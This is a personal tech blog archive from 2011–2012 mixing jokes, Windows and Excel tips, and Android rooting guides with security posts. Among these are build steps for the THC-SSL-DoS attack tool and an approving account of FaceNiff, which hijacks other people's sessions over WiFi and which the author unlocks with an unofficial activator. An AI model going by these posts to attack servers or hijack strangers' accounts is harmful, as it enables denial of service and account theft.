MySEQ

Change IP Address and DNS settings

2012-01-26T16:35:00.000+08:00

I've shown how to add multiple IP addresses in Windows 7 before. Today, let's go back to basic.

Set a static IP address on NIC:
netsh interface ip set address name=”Local Area Connection” static 192.168.1.100 255.255.255.0 192.168.1.1

Set to DHCP:
netsh interface ip set address name=”Local Area Connection” source=dhcp

Set the primary DNS and secondary DNS settings:
netsh interface ip set dns name=”Local Area Connection” static 192.168.1.1
netsh interface ip add dns name=”Local Area Connection” 8.8.8.8 index=2

Set the DNS setting to DHCP:
netsh interface ip set dnsservers name=”Local Area Connection” source=dhcp

REMnux 3.0 is Ready

2011-12-23T21:18:00.000+08:00

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. This is version 3.0 of the REMnux distribution.

To learn about REMnux and for tips on getting started, please visit http://REMnux.org.

There are 2 versions available for download at http://sourceforge.net/projects/remnux/files/version3/:

Live CD ISO (830MB)
VMware virtual appliance (717MB)

You can refer to http://zeltser.com/remnux/ for the list of malware analysis tool set in REMnux.

Petals Around the Rose

2011-12-21T13:29:00.003+08:00

Today I just become a Potentate of the Rose. You should give the game a try at Lloyd Borrett - Computing - Play the Petals Around the Rose game (JavaScript).

P/s: Bill Gate was introduced to this game in 1977.

An Engineer Vs A Manager

2011-12-15T10:42:00.001+08:00

A man is flying in a hot air balloon and realizes he is lost.

He reduces height and spots a man down below. He lowers the balloon further and shouts,"Excuse me, can you help me? I promised my friend I would meet him half an
hour ago, but I don't know where I am."

The man below says, "Yes. You are in a hot air balloon, hovering approximately 30 feet above this field. You are between 40 and 42 degrees North latitude, and between 58 and 60 degrees West longitude."

"You must be an engineer," says the balloonist.

"I am," replies the man. "How did you know?"

"Well," says the balloonist, "everything you have told me is technically correct, but I have no idea what to make of your information, and the fact is I am still lost."

The man below says, "You must be a manager?"

"I am," replies the balloonist, "but how did you know?"

"Well," says the man, "You don't know where you are, or where you are going. You have made a promise which you have no idea how to keep, and you expect me to solve your problem. The fact is you are in the exact same position you were in before we met, but now it is somehow my fault."

Books.com.tw Maintenance

2011-11-26T20:39:00.001+08:00

博客來 maintenance

Geek Jokes

2011-11-24T21:04:00.001+08:00

Just found a page of 1-liner geek joke at http://www.kailashnadh.name/docs/geek_jokes/

Those with underline are what I like most!

There are 10 types of people in the world: those who understand binary, and those who don't
If at first you don't succeed; call it version 1.0
I'm not anti-social; I'm just not user friendly
My software never has bugs. It just develops random features
Roses are #FF0000 , Violets are #0000FF , All my base belongs to you
In a world without fences and walls, who needs Gates and Windows?
Hand over the calculator, friends don't let friends derive drunk
I would love to change the world, but they won't give me the source code
Enter any 11-digit prime number to continue...
The box said 'Requires Windows 95 or better'. So I installed LINUX
A penny saved is 1.39 cents earned, if you consider income tax
Unix, DOS and Windows...the good, the bad and the ugly
A computer lets you make more mistakes faster than any invention in human history - with the possible exceptions of handguns and tequila
The code that is the hardest to debug is the code that you know cannot possibly be wrong
UNIX is basically a simple operating system, but you have to be a genius to understand the simplicity
Ethernet (n): something used to catch the etherbunny
C://dos

C://dos.run
run.dos.run

You know it's love when you memorize her IP number to skip DNS overhead
JUST SHUT UP AND REBOOT!!
1f u c4n r34d th1s u r34lly n33d t0 g37 l41d
Alcohol & calculus don't mix. Never drink & derive
How do I set a laser printer to stun?
There is only one satisfying way to boot a computer
Concept: On the keyboard of life, always keep one finger on the escape button
It's not bogus, it's an IBM standard
Be nice to the nerds, for all you know they might be the next Bill Gates!
The farther south you go, the more dollar stores there are
Beware of programmers that carry screwdrivers
The difference between e-mail and regular mail is that computers handle e-mail, and computers never decide to come to work one day and shoot all the other computers
If you want a language that tries to lock up all the sharp objects and fire-making implements, use Pascal or Ada: the Nerf languages, harmless fun for children of all ages, and they won't mar the furniture
COFFEE.EXE Missing - Insert Cup and Press Any Key
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning
LISP = Lots of Irritating Silly Parentheses
The beginning of the programmer's wisdom is understanding the difference between getting program to run and having a runnable program
Squash one bug, you'll see ten new bugs popping
Everytime i time i touch my code, i give birth to ten new bugs
boast = blogging is open & amiable sharing of thoughts
We are sorry, but the number you have dialed is imaginary. Please rotate your phone 90 degrees and try again
Cannot find REALITY.SYS. Universe halted
If it weren't for C, we'd all be programming in BASI and OBO
Bad command or file name! Go stand in the corner
Bad or corrupt header, go get a haircut
Unrecognized input, get out of the class
Warning! Buffer overflow, close the tumbler !
WinErr 547: LPT1 not found... Use backup... PENCIL & PAPER
Bad or missing mouse driver. Spank the cat? (Y/N)
Computers make very fast, very accurate mistakes
Best file compression around: "rm *.*" = 100% compression
Hackers in hollywood movies are phenomenal. All they need to do is "c:\> hack into fbi"
BREAKFAST.COM Halted...Cereal Port Not Responding
I survived an NT installation
The name is Baud......James Baud
My new car runs at 56Kbps
Why doesn't DOS ever say "EXCELLENT command or filename!"
File not found. Should I fake it? (Y/N)
Cannot read data, leech the next boy's paper? (Y/N)
CONGRESS.SYS Corrupted: Re-boot Washington D.C (Y/n)?
Does fuzzy logic tickle?
Helpdesk : Sir, you need to add 10GB space to your HD , Customer : Could you please tell where I can download that?
Windows: Just another pane in the glass
Who's General Failure & why's he reading my disk?
RAM disk is not an installation procedure
Shell to DOS...Come in DOS, do you copy? Shell to DOS...
The truth is out there...anybody got the URL?
Smash forehead on keyboard to continue.....
E-mail returned to sender -- insufficient voltage
Help! I'm modeming... and I can't hang up!!!
All wiyht. Rho sritched mg kegtops awound?
Once I got this error on my Linux box: Error. Keyboard not attached. Press F1 to continue
Once I got this error on my Linux box: Error. Mouse not attached. Please left click the 'OK' button to continue
Press any key to continue or any other key to quit...
Press every key to continue
Helpdesk: Sir if you see the blue screen, press any key to continue. Customer : hm.. just a min.. where's that 'any key'..
Idiot, Go ahead, make my data!
Old programmers never die; they just give up their resources
To err is human - and to blame it on a computer is even more so
(001) Logical Error CLINTON.SYS: Truth table missing
Clinton:/> READ | PARSE | WRITE | DUMP >> MONKIA.SYS
(D)inner not ready: (A)bort (R)etry (P)izza
Computers can never replace human stupidity
A typical Yahoo! inbox : Inbox(0), Junk(9855210)
(A)bort, (R)etry, (P)anic?
Bugs come in through open Windows
Penguins love cold, they wont survive the sun
Unix is user friendly...its just selective about who its friends are
Artificial intelligence usually beats real stupidity
Bell Labs Unix -- Reach out and grep someone.
To err is human...to really foul up requires the root password.
Invalid password : Please enter the correct password to (Abort / Retry / Ignore )
FUBAR - where Geeks go for a drink
I degaussed my girlfriend and I'm just not attracted to her anymore
Scandisk : Found 2 bad sectors. Please enter a new HD to continue scanning
Black holes are where God divided by zero
Hey! It compiles! Ship it!
Thank god, my baby just compiled
Yes! My code compiled, and my wife just produced the output
Windows 98 supports real multitasking - it can boot and crash simultaneously
Zap! And there was the blue screen !
Please send all spam to my main address, root@localhost :-)
MailerD(a)emon: You just received 9133547 spam. (O)pen all, (R)ead one by one, (C)heck for more spam
A: Can you teach me how to use a computer? B: No. I just fix the machines, I don't use them
PayPal: Your funds have been frozen for 668974 days
1-800-404 : The subscriber you are trying to call does not exist
1-800-403 : Access to that subscriber was denied
Error message: "Out of paper on drive D:"
If I wanted a warm fuzzy feeling, I'd antialias my graphics!
A printer consists of three main parts: the case, the jammed paper tray and the blinking red light
"Mr. Worf, scan that ship." "Aye Captain. 300 dpi?"
Smith & Wesson: The Original Point And Click Interface
Shout onto a newsgroup : It echoes back flames and spam
Firewall : Intruder detected. (A)llow in (D)eactivate the firewall
Real programmers can write assembly code in any language
Warning! Perl script detected! (K)ill it , (D)eactivate it
Firewall : Do you want to place a motion detector on port 80 ?
Helpdesk: Sir, please refill your ink catridges Customer : Where can i download that?
All computers run at the same speed... with the power off
You have successfully logged in, Now press any key to log out
Sorry, the password you tried is already being used by Dorthy, please try something else.
Sorry, that username already exists. (O)verwrite it (C)ancel
Please send all flames, trolls, and complaints to /dev/toilet
Shut up, or i'll flush you out
Cron : Enter cron command \ Now enter the number of minutes in an hour
We are experiencing system trouble -- do not adjust your terminal
You have successfully hacked in, Welcome to the FBI mainframes.
I'm sorry, our software is perfect. The problem must be you
Never underestimate the bandwidth of a station wagon full of tapes hurling down the highway
Webhost livehelp: Sir you ran out of bandwidth, User: Where can I download that?
If Ruby is not and Perl is the answer, you don't understand the question
Having soundcards is nice... having embedded sound in web pages is not
My computer was full, so I deleted everything on the right half
You have received a new mail which is 195537 hours old
Yahoo! Mail: Your email was sent successfully. The email will delivered in 4 days and 8 hours
I'm sorry for the double slash (Tim Berners-Lee in a Panel Discussion, WWW7, Brisbane, 1998)
Ah, young webmaster... java leads to shockwave. Shockwave leads to realaudio. And realaudio leads to suffering
What color do you want that database?
C++ is a write-only language. I can write programs in C++, but I can't read any of them
As of next week, passwords will be entered in Morse code
earth is 98% full ... please delete anyone you can
A typical yahoo chat room: "A has signed in, A has signed out, B has signed in, B has signed out, C has signed in, C has signed out.."
When someone says "I want a programming language in which I need only say what I wish done," give him a lollipop
Warning! No processor found! Press any key to continue
Failure is not an option. It comes bundled with your Microsoft product
NT is the only OS that has caused me to beat a piece of hardware to death with my bare hands
Warning! Kernel crashed, Run for your lives !
NASA uses Windows? Oh great. If Apollo 13 went off course today the manual would just tell them to open the airlock, flush the astronauts out, and re-install new one
JavaScript: An authorizing language designed to make Netscape crash
How's my programming? Call 1-800-DEV-NULL
Yes, friends and neighbors, boys and girls - my PC speaker crashed NT
root:> Sorry, you entered the wrong password, the correct password is 'a_49qwXk'
New linux package released. Please install on /dev/null
Quake and uptime do not like each other
Unix...best if used before: Tue Jan 19 03:14:08 GMT 2038
As you well know, magic and weapons are prohibited inside the cafeteria -- Final Fantasy VIII
Man is the best computer we can put aboard a spacecraft...and the only one that can be mass produced with unskilled labo
Unix is the only virus with a command line interface
Windows 95 makes Unix look like an operating system
How are we supposed to hack your system if it's always down!
God is real, unless declared integer
I'm tempted to buy the slashdot staff a grammar checker. What do they do for 40 hours a week?
Paypal : Please enter your credit card number to continue
It takes a million monkeys at typewriters to write Shakespeare, but only a dozen monkeys at computers to run Network Solutions
Please help - firewall burnt down - lost packet - reward $$
If Linux were a beer, it would be shipped in open barrels so that anybody could piss in it before delivery
Thank you Mario! But our princess is in another castle
Perl, the only language that looks the same before and after RSA encryption
Norton: Incoming virus - (D)ownload and save (R)un after download
I had a dream... and there were 1's and 0's everywhere, and I think I saw a 2!
You sir, are an unknown USB device driver
C isn't that hard: void (*(*f[])())() defines f as an array of unspecified size, of pointers to functions that return pointers to functions that return void

THC-SSL-DoS on BackTrack5

2011-11-15T18:03:00.001+08:00

One Oct 24, 2011, The Hacker Choice (THC) released a DoS tool that targeting vulnerable SSL/https servers. Here's how I compile it on BT5 together with a modified version.

First, I download the modified version of thc-ssl-dos.c from http://pastebin.com/bKLue33X. Instead of conducting a real DoS attack, the modified version will merely check if the target server vulnerable or not.

Secondly, I have to install the libssl-dev. I download the latest copy of OpenSSL and point the configure script to the libraries.

# tar zxvf openssl-1.0.0e.tar.gz
# cd openssl-1.0.0e
# make
# cd ../thc-ssl-dos-1.4
# ./configure --prefix=/opt/thc-ssl-dos --with-includes=/opt/openssl-1.0.0e/include/ --with-libs=/opt/openssl-1.0.0e/
# make
# cd /opt/thc-ssl-dos/src

# ./thc-ssl-dos
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options]
-h help
-l Limit parallel connections [default: 400]

# mv /opt/thc-ssl-dos /opt/thc-ssl-dos-attack
# cd ..

# tar zxvf thc-ssl-dos-1.4.tag.gz

# cd ../thc-ssl-dos-1.4/src
# cp /opt/SSL_Renegotiation_Check_-_thc-ssl-dos.c_modification.txt thc-ssl-dos.c
# ..
# ./configure --prefix=/opt/thc-ssl-dos --with-includes=/opt/openssl-1.0.0e/include/ --with-libs=/opt/openssl-1.0.0e/
# make
# cd ..
# mv /opt/thc-ssl-dos /opt/thc-ssl-dos-check

Install Chromium in Backtrack 5

2011-11-15T17:44:00.001+08:00

I installed BackTrack 5 recently. I follow the instruction from http://koko-newbie.blogspot.com/2011/09/install-google-chrome-in-backtrack-5_03.html.

Here's how I install the Chromium browser into my Backtrack:

apt-get install chromium-browser
cd /usr/lib/chromium-browser
hexedit chromium-browser

[Tab] to mode string
[ctrl-s], type geteuid
Replace geteuid as getppid
[ctrl-x] to save-and exit.

The reason to modify the geteuid with hexedit is to bypass the restriction on running Google Chrome browser as root.

Bossa Vino on Google+ Page

2011-11-15T10:09:00.001+08:00

I'm sure it is not just me.

2011-11-04T19:57:00.000+08:00

FB Site Maintenance

Facebook Account Temporarily Unavailable

2011-11-04T19:21:00.002+08:00

FB Account Temporarily Unavailable

New Google Reader is like SHIT

2011-11-01T17:15:00.000+08:00

With the new Google Reader interface becomes like shit, all my notes in Reader gone.

After some googling, then I manage to find back my note in Reader.

To access the notes:

http://www.google.com/reader/view/user/-/state/com.google/created

To access the RSS feed of the notes:

http://www.google.com/reader/atom/user/-/state/com.google/created

To limit to 100 notes to display:

http://www.google.com/reader/atom/user/-/state/com.google/created?n=100

P/s: the new Google Reader is damn slow in performance.

Not Salesforce's Fault

2011-10-31T23:12:00.000+08:00

It is not my fault ;-(

Installation/Uninstallation of VMware Player Hangs

2011-10-27T17:42:00.000+08:00

If you are like me, where the installation or uninstallation of VMware Player keeps hang/fail, then you are lucky here.

I used to install VMware Player and then I upgrade to VMware Workstation 7.1 (trial). After the trial expire, and I'm planning to uninstall VMware Workstation and keeps only VMware Player (which is free).

I tried multiple times, the uninstallation process keeps hang (forever). Then I try to download the latest copy of VMware Player, and wish I could install to override it. It doesn't work.

Then I tried to be a "good-boy" and follow the installation instruction (manual way) provided by VMware at the following URL:

http://faq.sanbarrow.com/index.php?solution_id=1113

Same thing happens. I even tried install the new copy using command line as below:

VMware-player-4.0.0-471780.exe /z "action"="install"

Still fails. :-(

Then I also tried extract the installation EXE to a temporary folder:

VMware-player-4.0.0-471780.exe /e tempdir

And then double click the MSI to install it. End up the same shit happens.

Finally, when I about to give up on VMware, I found 1 last thing to do before switching to VirtualBox.

start regedit.exe
Browse to the following sub-key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
You should see keys named 0, 1, 2, 3 and 4. In my case I had a folder named "L" before the 0.
Remove the key with "L" (actually it is "└", unicode #2514)

It works like a charm now.

P/s: This is due to Microsoft screws up the registry Internet Zone settings in the registry. With the "└" key, it cause Javascript not to be called from an application.

iPhone still sucks

2011-10-24T15:40:00.000+08:00

There are 2 groups of iPhone users: those who love it so much and hate it. This is the post for those who hate it.

OK, we all know iPhone sucks, partly it is due to iTune (another crap). And the number 1 reason I say "iPhone sucks" is because it has no easy way for your iPhone to connect to a new laptop. It will wipe off everything on your phone if you try to do it. Having a new laptop or re-install your laptop nowadays in common. It may due to virus or loss of your laptop. (Don't tell me to use MacBook, your MacBook can be stolen or affected by virus too).

Today, I found a way to overcome this issue when you bang into a similar situation next time.

Here's the step:

Authorize your new laptop with the same iTunes account.
Plug in your iPhone to the new laptop, and select File > Transfer Purchases [ This cause iTunes to transfer apps from iPhone to new laptop]
Sync your iPhone with iTunes by click the Apps tab, ticking the sync apps link, and applying.
Now, right-click your device in the iTunes sidebar and select backup.
Now, just apply any update like iOS 5 like you normally would by click the Update button.

All your apps and settings should remain in tact. Now should I say iPhone is not suck anymore?

No, iPhone still sucks because this method only transfer apps you've grabbed through the iTunes Store, which means, for example, the MP3s you'd synced to your device that you didn't buy from Apple probably gone (forever).

WhatIsMyIPAddress by Google

2011-10-19T20:48:00.000+08:00

You can now ask Google what is your public IP address by query with the following:

my ip
my ip address
show my ip
what is my ip

Very cool ;-)

Automated Telnet Commands with VB script

2011-10-19T14:05:00.000+08:00

Here's a VB script that can automate simple Telnet commands. Below is what happens during the telnet session in manual way:

Connect to an IP address on specific TCP port.
Press [ Enter ] to login.
Input the numeric key "5" and follow by an [ Enter ] key.

Below is the VB script that can automate the steps above:

<job>
<script language="VBScript">
Option Explicit
On Error Resume Next
Dim WshShell
set WshShell=CreateObject("WScript.Shell")
WshShell.run "cmd.exe"
WScript.Sleep 1000
'Send commands to the window as needed - IP and commands need to be customized
'Step 1 - Telnet to remote IP and port 99'
WshShell.SendKeys "telnet 192.168.1.1 99"
WshShell.SendKeys ("{Enter}")
WScript.Sleep 1000

'Step 2 - Issue Commands with pauses'
WshShell.SendKeys ("{Enter}")
WScript.Sleep 1000
WshShell.SendKeys "5"
WshShell.SendKeys ("{Enter}")
WScript.Sleep 1000

'Step 3 - Exit Command Window
WshShell.SendKeys "exit"
WshShell.SendKeys ("{Enter}")
WScript.Quit
</script>
</job>

>>>> Original article at MakeUseOf

Update My Nexus S to CM 7.1

2011-10-15T15:37:00.000+08:00

Below are the steps I took to upgrade my Nexus S to CM 7.1 recently.

Step 1: Download the update-cm-7.1.0-NS-signed.zip file of CyanogenMod 7.1 for my phone.
Step 2: Transfer the .zip file to the root folder.
Step 3: Turn off my phone once the transfer is complete.
Step 4: Boot into ClockworkMod Recovery mode by holding volume up and power buttons.
Step 5: Using the volume up/down (to navigate) and power key (to select), then navigate to backup and storage > backup.
Step 6: From the main menu: install zip from sdcard > choose zip from sdcard > update-cm-7.1.0-NS-signed.zip
Step 7: Once flashing is complete, reboot and it is done.

CyanogenMod 7.1

Activate ActiveX Filtering in IE9

2011-09-19T14:11:00.000+08:00

ActiveX Filtering is a new feature available in IE9 and it is disable by default.

It allows a whitelist style protection scheme. When enabled NO ActiveX Controls are allowed to run, then when you go to a site that requires ActiveX Controls, if you trust the site you can add them to the whitelist. Only websites on the list will be able to run ActiveX Controls.

To enable ActiveX Filtering, go to Tools Menu>Safety and then select the ActiveX Filtering Option.

Enable ActiveX Filtering

Penetration Testing Execution Standard

2011-08-25T13:44:00.000+08:00

There is a new homepage created for "Penetration Testing Execution Standard" at http://www.pentest-standard.org/index.php/Main_Page

Although it is still at alpha release, you can see the coverage of many tools. The web site is created in the form of wiki and mind map. Here's the brief summary:

Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting

Hacking Resistance (Time-to-Hack)

2011-08-23T13:04:00.002+08:00

After I read from the article, "ModSecurity SQLi Challenge: Lesson Learned", I learned a lot more about SQLi.

I can see a lot of creative ways to bypass security rules in order to inject SQL statements. The rule of thumb is blacklist filtering is not adequate to fully prevent SQLi.

In the last section of the article is what that catch my eyes, the "Hacking Resistance (Time-to-Hack)". In the article,

The real goal of using a web application firewall should be to gain visibility and to make your web applications more difficult to hack meaning that it should take attackers significantly more time to hack a vulnerable web site with a WAF in front in blocking mode vs. if the WAF was not present at all.

The idea is to substantially increase the "Time-to-Hack" metric associated with compromising a site in order allow for operational security to identify the threat and take appropriate actions.

Think of a WAF as a tool to identify and block the initial probes and to alert incident response personnel. It is up to the IR teams to match wits with an attacker and protect the application as necessary.

The article also include the analysis of how long it took for each Level II winner to develop a working evasion for the CRS v2.2.0. Here's the result:

Avg. # of Requests to find an evasion: 433
Avg. Duration (Time to find an evasion): 72 hrs
Shortest # of Requests to find an evasion: 118
Shortest Duration (Time to find an evasion): 10 hrs

The conclusion is: the data shows that having active monitoring and response capabilities of ongoing web attacks is paramount as it may only a matter of hours before a determined attacker finds a way through your defenses.

Google+ Games

2011-08-12T21:00:00.000+08:00

I just have my Google+ Games enabled today.

Google+ Games

And this is the first game that I play.

Angry Bird in Google+ Games

Backup Your Data from The Cloud

2011-07-21T16:14:00.001+08:00

Cloud computing is hot. It is the backend system that supports many information systems such as email, social networks, photos, etc. However, have you ever plan to backup your data from the Cloud one day?

There are 2 options: Google Takeout and Cloud Export.

Google Takeout (from Google) allows you to download all your data from their services. This includes +1, Buzz, Contacts and Circles, Picasa web albums, profile and streams.

Cloud Export is a Windows application that will backup everything for you. Once login, it will download your contacts, Gmail, Reader subscriptions, Blogger entries, and more and store them all locally. The service supports Google accounts, Google Apps accounts, and even Twitter, Identi.ca, and more.

Gmail Shortcuts

2011-07-13T18:12:00.002+08:00

I didn't know that there is a keyboard shortcut in GMail until today. This is by accidentally, I press the "?" or "Shift + /".

;-)

Complete Guide for Unlocking and Rooting Android Phone

2011-07-12T18:20:00.000+08:00

Today, I found 2 great articles that explain what/how to unlock and root an android phone.

MerdekaReview Error Page

2011-07-09T11:05:00.003+08:00

MySQL Error on MerdekaReview site

Facebook -1 Database Error

2011-07-06T11:31:00.001+08:00

Facebook error shows "-1" comments

FaceNiff and Activator

2011-07-05T12:23:00.000+08:00

Heard about FaceNiff? How about Firesheep?

Firesheep is so hot since last year. It is an add-on to the Firefox browser which can hijack any non-SSL Facebook session (and others like Gmail, etc). It is still cool today!

FaceNiff takes it to the next level, by doing the same thing as Firesheep, and run on rooted Android phone.

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)
It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!).

Now, the apk you download from FaceNiff is limited to 3 hijacked profiles. But there is a way to unlock the application. You need a FaceNiff Activator. Just follow the instruction from the article on http://fcnactive.blogspot.com/2011/06/activate-faceniff.html and download the SOneActivator.apk.

As far as I understand, the reason why FaceNiff works on WPA2 network is because it does ARP poisoning to the WiFi network.

Now, I have my FaceNiff running with me everywhere I go!

Root Nexus S Android 2.3.3 Gingerbread using SuperBoot

2011-07-04T12:06:00.001+08:00

Just found another article on how to root Nexus S Android 2.3.3 Gingerbread using SuperBoot.

This is a much simple way to root your Nexus S. Just want to share here.

http://www.technobolt.com/2011/02/28/how-to-root-nexus-s-android-2-3-3-gingerbread-using-superboot/

Rooting Nexus S on Android 2.3.3 Gingerbread

2011-07-03T12:00:00.002+08:00

After I unlock my Nexus S, I need to start rooting it in order to get full permission to the filesystem.

Here's the steps that I followed:

Reboot Nexus S into bootloader mode. To do so, use the following command at terminal or press the Volume Up + Power key simultaneously.

adb reboot bootloader

Unlock the bootloader using the following command:

fastboot oem unlock

Download recovery-clockwork-herring.img from here.
Now install Clockwork recovery image on Nexus S by using the following command:

fastboot flash recovery recovery-clockwork-herring.img

Reboot into recovery mode by using the following command at terminal or choose recovery from fastboot menu

adb reboot recovery

Download Koush's unsecure boot image (rootboot.img) from here and put it in your /sdk/tools/ folder
Now boot into fastboot and use the following command to install the rooted boot image:

fastboot flash boot rootboot.img

Download CHainsDD's Superuser zip (su-2.3.6.1-ef-signed.zip) from here.
Open the zip file, place the su binary and Superuser.apk in your sdk/tools/ folder.
Now use the following set of commands at terminal to install Superuser app

adb remount
adb push su /system/bin/
adb push Superuser.apk /system/app/
adb shell
chmod 6755 /system/bin/su
exit
adb reboot

Unlocking Google Nexus S Bootloader

2011-07-02T11:53:00.001+08:00

I need to get full permission control on my Google phone in order to start research on it. I need to perform 2 things before I start any development: unlocking & rooting Nexus S.

Unlocking the bootloader will allow me to install custom ROM. And by rooting it, I can gain full access to the filesystem.

My phone comes with Android 2.3.3 Gingerbread. Here's the steps to unlock it:

Download and install Android 2.3 SDK along with fastboot from here.
Turn off your Nexus S completely.
Now hold down the Volume Up + Power key simultaneously.
Now you should be in standard recovery mode.
Open Command Prompt on Windows and type the following command to confirm if your device is connected via USB cable or not.

fastboot devices

If fastboot is showing your device as connected, use the following command to unlock the bootloader of your Nexus S.

fastboot oem unlock

Thats it! Now your Nexus S' bootloader is unlocked and you can easily install custom ROMs on your device.

My Google Nexus S

2011-07-01T11:37:00.000+08:00

Recently I just get my first Android phone (Nexus S). Thus I can start my research on Android phone from now on.

Bye Bye, my iPhone 3G!

Dark Bar from Google

2011-06-29T10:53:00.000+08:00

See the dark bar on the top?

Microsoft Office 365

2011-06-29T10:50:00.000+08:00

Microsoft Office 365 drops its BETA tag today.

Microsoft published release notes and unveiled tiered pricing plans that start at $6/month per user for small businesses and ranges between $10 and $27/month per user for large enterprises depending on the features needed.

Office 365 combines Office Web Apps with additional collaboration services for businesses, including Outlook through Exchange Online, document sharing with Sharepoint Online, and corporate instant messaging and presence with Lync Server.

Enhancing your vlookup function

2011-06-28T11:30:00.000+08:00

Here's another tip to help enhancing the way how you use your vlookup function by removing the "#N/A" when the unique key isn't available.

We can remedy this by judicious use of Excel’s IF() and ISBLANK() functions. We change our formula from this…

=VLOOKUP(A11,’Product Database’!A2:D7,2,FALSE)

…to this…

=IF(ISBLANK(A11),”",VLOOKUP(A11,’Product Database’!A2:D7,2,FALSE))

Lock the Table_array in vlookup function

2011-06-28T11:23:00.000+08:00

A lot of time, we use vlookup function to help us to retrieve information from another table and we will like to lock the Table_array range. By default, Excel doesn't fix the range and keep shifting it when you copy and paste the vlookup function.

Here's the quick fix.

After you create the 1st vlookup function, it will like this:

VLOOKUP(A11,’Product Database’!A2:D7,2,FALSE)

To lock the table range before you copy and paste the function, add the $ to fix the cell reference, as below:

VLOOKUP(A11,’Product Database’!A$2:D$7,2,FALSE)

This fix the row 2 to row 7. Of course, you can also fix the column A to column D at the same time:

VLOOKUP(A11,’Product Database’!$A$2:$D$7,2,FALSE)

Using VLOOKUP in Excel

2011-06-28T11:12:00.000+08:00

This is a short description on how to use "vlookup" function in Excel.

Vlookup function is one of the the most powerful Excel tips that I learn. It works like a database tables, where it can retrieve information from another database table by supplying it an unique identifier. For instance, you can use vlookup function to retrieve the product description (from another sheet) by supplying it the product code.

From the menu Formulas, Insert functions, search the function called vlookup. You need to supply 3 mandatory parameters and 1 optional parameter:

Lookup_value: [ the unique key]
Table_array: [ the table range ]
Col_index_num: [ the column of the retrieved information in the table range]
Range_lookup (optional): [ sorted or unsorted 1st column in the table range ]

Quickly Remove Blank Row in Excel

2011-06-27T21:36:00.000+08:00

Here's a handy way to help you to remove any blank row in a long list.

Remove any blank column manually.
Select the 1st blank cell in the 1st column.
Hit F5 (Edit, Goto).
Click Special.
Select the Blank option and click OK. This will select all the blank row for you.
Now, choose Edit, Delete, select the Entire Row option and click OK.

FB Account Unavailable

2011-06-23T17:31:00.000+08:00

Facebook Login: Account Unavailable

Bossa Vino Next 2 Km

2011-06-15T16:35:00.006+08:00

Bossa Vino, Next 2Km

Fun Vs. Time

2011-06-04T17:00:00.000+08:00

Fun Vs. Time

SonyPictures.com is Hacked via sqli

2011-06-03T20:25:00.003+08:00

Sony Pictures web site is hacked, via SQL injection. All the user ID, emails, and password are shown in plaintext (and available for download).

RSA (March), PSN (April~May), Sony Pictures (June), what's next?

A good write up on Sony PSN attack at Deciphering the Sony PSN Attack.

Where's the fun in a week?

2011-06-02T08:00:00.000+08:00

Where's the fun?

Incident Response Methodologies (IRM)

2011-06-01T14:25:00.000+08:00

Go download a copy of all the IRM cheat sheets published at CERT Societe Generale. It provides easy to use operational incident best practices. These cheat sheets are dedicated to incident handling and cover multiple fields on which a CERT team can be involved.

There are all in PDF format:

IRM-1: Worm infection
IRM-2: Windows Intrusion
IRM-3: UNIX Intrusion
IRM-4: Distributed Denial of Services
IRM-5: Malicious Network Behavior
IRM-6: Website Defacement

Error in Static HTML on Facebook

2011-05-27T13:25:00.007+08:00

http://apps.facebook.com/statichtml/?installed=1

It reviews the directory path, table name and field names in the database.

Fighting Mail Spam Takes A Month

2011-05-27T10:03:00.053+08:00

User: "Hi (mail) administrator, I keep receive some spam mails from a user. Can you advise me what should I be doing? And here are the samples of the spams I received."

(after 1 week)

Mail Admin: "We received your request. After an in-depth study, we found that we can't do much about it. Because the source of the spam is coming from our business partner. We'll pass this case to Security Forensic team for further investigation."

(after 3 days)

Forensic team lead: "Hi Mail Admin, we confirm that this is a real spam from our business partner. However, we cannot simply block them at the mail gateway. Or else it may cause some legal issue with our business partner. We'll have a discussion with legal team for further action."

(after 1 week)

Legal team : "Hi, forensic team! Unfortunately the answer is No. We can't block [ ALL ] their emails. This will cause the loss in business and if we can't receive email from the business partner, we may be having legal issues with them. No, please don't do anything stupid."

(after 3 days)

Forensic team: "Hi Mail Admin, there is nothing much I can do. The advice from the legal team is [ no ]. Please advise the user that we can't afford to loss the business. And make sure our mail gateway never ever [ block ] any email from the business partner."

(after 1 week)

Mail Admin: "Hi user, after some discussions with forensic and legal teams, we would not will never block the spam mail (from the business partner) for you. It may involve complicated legal issue and the loss of business."

"However, we'll offer you another solution. You may configure a filter in your Outlook to filter all the emails for you. With this, you will not see any more spam mails. Please follow the instruction at our sharepoint site. There is a detail step-by-step instruction there."

User: "Thank you very much, Mail Admin. It really solve my problem now after I follow the instructions from the sharepoint site."

Bossa Vino

2011-05-26T15:14:00.004+08:00

facebook.com/BossaVino

Google Vs Facebook

2011-05-21T15:33:00.010+08:00

We all know that Facebook is hot now. But how much more does it better than Google?

We can "google" the answer for this, using Google Trends. As always, a picture worth thousand of words.

google
1.00

facebook
2.25

Google Vs. Facebook

Angry Birds

2011-05-18T22:26:00.022+08:00

Google Chrome team releases an online HTML5/Javascript game, Angry Birds. You can install it as an app via1 Web Store if you are using Chrome.

There are 2 quick hacks for this game. 1 for you to access to all levels, including the special Chrome level. Another 1 is for you to set all levels locked.

In the talk Rovio did at Google IO, they mentioned they were using HTML5′s LocalStorage. If you open up Web Inspector in chrome, you’ll see they are keeping track of your score and stars with localstorage. Lucky for us, that means we can use setItem() set all 70 levels to 3 and get access to them all.

To unlock all levels:

javascript: var i = 0; while (i<=69) { localStorage.setItem('level_star_'+i,'3'); i++; } window.location.reload();

To lock all the levels:

javascript: var i = 1; while (i<=69) { localStorage.setItem('level_star_'+i,'-1'); i++; } window.location.reload();

Social Networks Security

2011-05-17T14:01:00.004+08:00

Social Networks are a security game changer. Don't you see everyone is playing games on the FB apps nowadays?

